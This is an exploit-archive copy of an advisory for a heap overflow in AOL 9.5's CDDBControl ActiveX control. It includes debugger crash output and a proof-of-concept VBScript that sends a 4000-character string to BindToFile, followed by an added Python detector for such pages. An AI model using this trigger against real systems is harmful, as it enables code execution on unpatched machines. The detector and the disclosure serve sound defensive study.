AOL 9.5 ActiveX Heap Overflow Vulnerability

CVE: CVE-2008-2570
Category: CWE-119
Price: $10,000 - $25,000
Severity: High
Author: Belahsan Ouerghi
Risk: High
Exploitation Type: Local
Date: 2010-01-22
CPE: cpe:cpe:/a:aol:aol_desktop:9.5
CVSS: Not available
EPSS: 0.02192
EPSSP: 0.50148


Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010010074

Below is a copy:

Product:
AOL 9.5
 
Vulnerability:
ActiveX Heap Overflow
 
Discussion:
The vulnerability is in the ActiveX control ("CDDBControl.dll").
Sending a long string to BindToFile() triggers the vulnerability.
Successful exploits allow remote attackers to execute arbitrary code.
 
Debugger Results:
(fd0.1274): Access violation - code c0000005 (!!! second chance !!!)
eax=7efefefe ebx=00000000 ecx=0020d7c0 edx=41414141
esi=03465df0 edi=02b82000 eip=10033011 esp=0020cdac
ebp=0020ed20 iopl=0 nv up ei pl zr na pe nc
 
Credits:

Celil 'karak0rsan' Unuver and murderkey
from Hellcode Research

tcc.hellcode.net
forum.hellcode.net


L4stW0rdZ: "hi francis, do you think we forget you ??? of course not, don't wait patch, don't support vendors
and security industry ...." - mkey

---------------
PoC .wsf script:

<package><job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F' id='target' />

<script language='vbscript'>


arg1=String(4000, "A")
arg2=1

target.BindToFile arg1 ,arg2 

</script>
</job>
</package>
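
Added example (not part of the original advisory or of the Hellcode PoC): a Python check that flags script or HTML content which declares the CDDBControl CLSID shown above and calls BindToFile on that object. The function names and both sample inputs are constructed for illustration.

```python
import re

# CLSID of the CDDBControl ActiveX object, as given in the PoC above.
CDDB_CLSID = "BC8A96C6-3909-11D5-9001-00C04F4C3B9F"

OBJECT_TAG = re.compile(r"<object\b([^>]*)>", re.IGNORECASE)
# name=value with single-quoted, double-quoted or bare values.
ATTR = re.compile(r"""([\w:-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s'">/]+))""")
# VBScript and HTML are case-insensitive, so the method match is too.
CALL = re.compile(r"\b([A-Za-z_]\w*)\s*\.\s*BindToFile\b", re.IGNORECASE)


def parse_attrs(tag_body):
    """Return the tag's attributes as a dict with lower-cased names."""
    attrs = {}
    for name, single, double, bare in ATTR.findall(tag_body):
        attrs[name.lower()] = single or double or bare
    return attrs


def find_bindtofile_calls(text):
    """Return (object id, line number) for every BindToFile call made on an
    object declared with the CDDBControl CLSID."""
    ids = set()
    for match in OBJECT_TAG.finditer(text):
        attrs = parse_attrs(match.group(1))
        if attrs.get("classid", "").lower() == "clsid:" + CDDB_CLSID.lower():
            if attrs.get("id"):
                ids.add(attrs["id"].lower())
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for call in CALL.finditer(line):
            if call.group(1).lower() in ids:
                hits.append((call.group(1), lineno))
    return hits


# Constructed sample inputs (not taken from any real page).
SAMPLE_SUSPICIOUS = """\
<html><body>
<OBJECT ID="cddb" CLASSID="CLSID:bc8a96c6-3909-11d5-9001-00c04f4c3b9f"></OBJECT>
<script language="vbscript">
Cddb.BindToFile someName, 1
</script></body></html>
"""
SAMPLE_BENIGN = """\
<object id="other" classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<script language="vbscript">
other.BindToFile someName, 1
</script>
"""

if __name__ == "__main__":
    print(find_bindtofile_calls(SAMPLE_SUSPICIOUS))
    print(find_bindtofile_calls(SAMPLE_BENIGN))
```

The check only covers objects declared with an <object> tag; it does not follow objects created at run time.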

